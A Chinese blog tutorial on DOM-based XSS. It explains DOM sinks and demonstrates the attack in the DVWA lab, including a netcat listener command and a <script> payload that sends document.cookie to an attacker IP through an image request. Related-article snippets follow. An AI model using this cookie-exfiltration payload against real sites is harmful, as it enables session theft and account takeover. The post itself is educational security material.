xss之DOM型

最新推荐文章于 2025-07-21 00:58:16 发布
原创 最新推荐文章于 2025-07-21 00:58:16 发布 · 6.8k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

1.DOM型xss原理

在这里插入图片描述
dom就是一个树状的模型,你可以编写Javascript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点,对象,值。了解了这么一个知识点,你就会发现,其实dom xss并不复杂,他也属于反射型xss的一种(domxss取决于输出位置,并不取决于输出环境,因此domxss既有可能是反射型的,也有可能是存储型的),简单去理解就是因为他输出点在DOM。dom - xss是通过url传入参数去控制触发的)分析完dom-xss之后,再说说存储型xss,其实也很好理解,存储型xss,自然就是存入了数据库,再取出来,导致的xss)反射型xss实际上是包括了dom - xss了,关键点仍然是在通过url控制了页面的输出(dom-xss也类似,只因为输出地点不同而导致结果不一致)。

DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞。

在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,客户端的脚本程序可以通过DOM来动态修改页面内容,从客户端获取DOM中的数据并在本地执行。基于这个特性,就可以利用JS脚本来实现XSS漏洞的利用。

2.DOM型xxs演示

可能触发DOM型XSS的属性:

document.referer属性

window.name属性

location属性

innerHTML属性

documen.write属性

1.利用创建元素createElement():制作按钮获取cookie

先在Kali监听1234端口:nc -nvlp 1234
然后在DVWA中输入
<script>var img=document.createElement('img');img.src='http://10.10.10.151:1234/a?'+escape(document.cookie);</script>

在这里插入图片描述2.利用innerHTML:篡改页面

在这里插入图片描述

在这里插入图片描述

`

实验:深入解析DOMXSS攻击及多种场景演示
NsbiCs的博客
10-10 624
DOMXSS是一种常见的Web安全漏洞,攻击者通过注入恶意脚本来利用网页中的DOM操作,从而实施攻击。输出编码:在将数据输出到网页时,使用适当的编码方式,如HTML实体编码(HTML entity encoding)或JavaScript编码,来防止恶意脚本的执行。当目标用户点击该URL时,恶意脚本将被注入到目标网页的DOM中,从而实现攻击。目标网页解析URL或用户输入:目标网页通过解析URL参数或用户输入,将恶意代码插入到网页的DOM结构中。场景二:恶意脚本注入到用户输入中。
XSS漏洞DOM总结、XSS利用(细)、XSS绕过
墨痕诉清风的博客
09-18 746
DOM,全称 Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。DOM XSS 其实是一种特殊类的反射 XSS,它是基于 DOM 文档对象模的一种漏洞。在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的 Document object 文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。
DOMXSS
ssslq的博客
03-05 1256
DOMXSS漏洞
DVWA靶场笔记之xssDOM)原理
Alonegrief的博客
11-30 2713
原理: Xss又叫跨站脚本攻击。他指的是恶意攻击者往web页面插入恶意html代码,当用户浏览该页面之时,嵌入其中web的html代码会被执行,从而达到恶意的特殊目的 Xss漏洞分为三类: 一、 反射xss:非持久化,攻击者事先制作好攻击连接,需要欺骗用户自己去点击连接才能触发xss代码(服务器中没有这样的页面和内容),一般容易出现搜索页面 二、 存储xss:持久化,代码是存储在服务器中的,如在个人信息或发表文章等地方,加入代码,如果没有过滤或过滤不严,那么这些代码将存储到服务器中,每当有用户访问该页面
XSS漏洞|DOM、存储、反射
pdxdhmk318的博客
07-21 1390
一、XSS漏洞一、XSS漏洞1、XSS漏洞简介XSS全称(跨站脚本攻击),是将恶意代码插入到Web页面中,当用户浏览到该页面时这些嵌入在Web页面的代码就会被执行,从而到达攻击者的攻击目的。2、漏洞产生原理形成XSS漏洞是:因为Web应用程序对用户输入的内容和程序输出的内容没有经过严格的校验和过滤,导致攻击者构造的恶意代码被带入后,又被当作正常的代码输出至前端页面,浏览器当作有效代码解析执行从而产生危害。3、漏洞的危害窃取用户信息网络钓鱼,包括获取各类用户浏览器账号。
web ---- DomXSS
L0g1c的博客
07-31 2811
存储xss最持久,而且更为隐蔽,因为是存在数据库当中的,触发的url当中没有带js或者其他的html代码,所以他的实用性更高。其次则是DomXSS因为它能绕过大部分浏览器的过滤,再其次才是反射XSS反射xss还要深思熟虑的考虑根据浏览器去bypass各种过滤,易用性稍微差一些(注意反射xssdomxss都需要在url加入js代码才能够触发)非持久xss攻击要求用户访问一个被攻击者篡改后的链接,用户访问该链接时,被植入的攻击脚本被用户游览器执行,从而达到攻击目的。...
XSS漏洞 DOM测试 payload代码
02-26
XSS漏洞 DOM测试 payload代码 这是测试跨脚本攻击是否有DOMXSS的漏洞,适合网络安全初学者进行测试。 跨脚本攻击漏洞是top10的一种。
反射XSS,存储XSSDomXSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录
weixin_43858799的博客
04-22 3241
XSS: 反射XSS,存储XSSDomXSS,如何获取cookie,XSS钓鱼,XSS获取键盘记录 一、跨站脚本漏洞(XSSXSS漏洞一直被评估为web漏洞中危害较大的漏洞 XSS是一种发生在web前端的漏洞,主要危害前端用户 XSS可以通过进行钓鱼攻击,前端js挖矿,用户cookie获取,甚至结合浏览器自身漏洞对主机进行远程控制等 攻击流程图: 危害:存储>反射>D...
DVWA靶场XSS DOMLOW级别演示举例
2301_77185537的博客
12-24 515
因此尝试修改URL中的default值,使它等于经典的XSS脚本payload网页弹窗。:因此我们查看网页前端的源代码,因为处理用户输入的只有前端的JavaScript代码。能够调出网页弹窗,也就能说明我们注入其他恶意的JavaScript代码也是没有问题的。:查看网站后台的PHP源代码,发现服务器端没有任何的PHP限制。:首先打开DVWA靶场XSS DOM 模块。靶场XSS DOM模块举例。
DOM XSS 攻击演示(附链接)
Flag少侠的博客
01-25 5950
DOM XSS 攻击演示(附链接)
DOM XSS 深度解析:原理、攻击手法、防御实践与实战案例
m0_57836225的博客
04-27 2152
DOM XSS(Document Object Model Cross-Site Scripting)是一种依赖 DOM 结构动态渲染的跨站脚本攻击。攻击完全发生在客户端:恶意脚本通过修改浏览器端的 DOM 树触发,无需与服务器进行数据交互。漏洞源于前端代码逻辑缺陷:开发者未对 DOM 操作的数据源进行安全过滤,导致恶意数据被解析为可执行脚本。与其他 XSS 的区别类存储位置触发方式依赖条件存储 XSS服务器数据库服务器主动渲染恶意内容服务器端过滤缺失反射性 XSS
DOMXSS详讲
weixin_59047731的博客
11-21 3929
在网站页面中有许多元素,当页面到达浏览器时,浏览器会为页面创建一个项级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。也就是说,客户端的脚本程序可以通过DOM动态修改页面内容,从客户端获取DOM中的数据并在本地执行。由于DOM是在客户端修改节点的,所以基于DOMXSS漏洞不需要与服务器端交互,它只发生在客户端处理数据的阶段。除了富文本的输出之外,在变量输出到HTML页面时,可以使用编码或者转义的方式来防御XSS攻击。
XSS | DOM XSS 攻击
Blue17 の 小窝
09-27 2387
在网站页面中有许多元素,当页面到达浏览器,浏览器会为页面创建一个顶级的 Document object 文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。DOM XSS 程序只有 HTML 代码,并不存在服务器端代码,所以此程序并没有与服务器端进行交互,是一个纯粹的运行在客户端的 JavaScript 脚本代码触发的 XSS 漏洞。标签中是没有任何内容的,这符合了我们上面讲的 DOM XSS,后端返回的数据包中不包含 XSS 攻击代码的特点。
DOMXSS
weixin_52351575的博客
10-02 666
反射和存储都是通过后台输出,DOM xss是纯前台的漏洞• 反射发出请求时,XSS代码出现在URL中,作为输入提交到服务器,服务器解析后响应,在响应的内容中出现这段XSS代码。大多只能影响单一用户。• 存储提交的XSS代码会存储在服务端(数据库、内存、文件系统等),下次请求目标页面时不用再提交XSS代码。可能会影响到网站的众多用户。• DOM
关于DOMXSS的深入解析(收藏)
热门推荐
告白的博客
01-11 1万+
很多初次接触xss的小白,尽管知道xss的三种分类,但是在DOMxss还是存在理解上的不足,这篇文章希望能帮助到更好的理解DOMxss
XSS注入——DOMXSS
wwwwyyyrre的博客
06-26 5711
XSS根据恶意脚本的传递方式可以分为3种,分别为反射、存储DOM,前面两种恶意脚本都会经过服务器端然后返回给客户端,相对DOM来说比较好检测与防御,而DOM不用将恶意脚本传输到服务器在返回客户端,这就是DOM和反射、存储的区别DOMxss可以在前端通过js渲染来完成数据的交互,达到插入数据造成xss脚本攻击,且不经过服务器,所以即使抓包无无法抓取到这里的流量。它是基于DoM文档对象的一种漏洞,并且DOMXSS是基于JS上的,并不需要与服务器进行交互。
反射XSSDOMXSS的区别?
最新发布
09-03
反射 XSSDOM XSS 都属于跨站脚本攻击 (XSS),均能通过注入恶意脚本在用户浏览器中执行,但在多个方面存在区别: - **数据流转**:反射 XSS 的数据流转经过服务器,服务器会直接返回包含恶意脚本的请求;...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值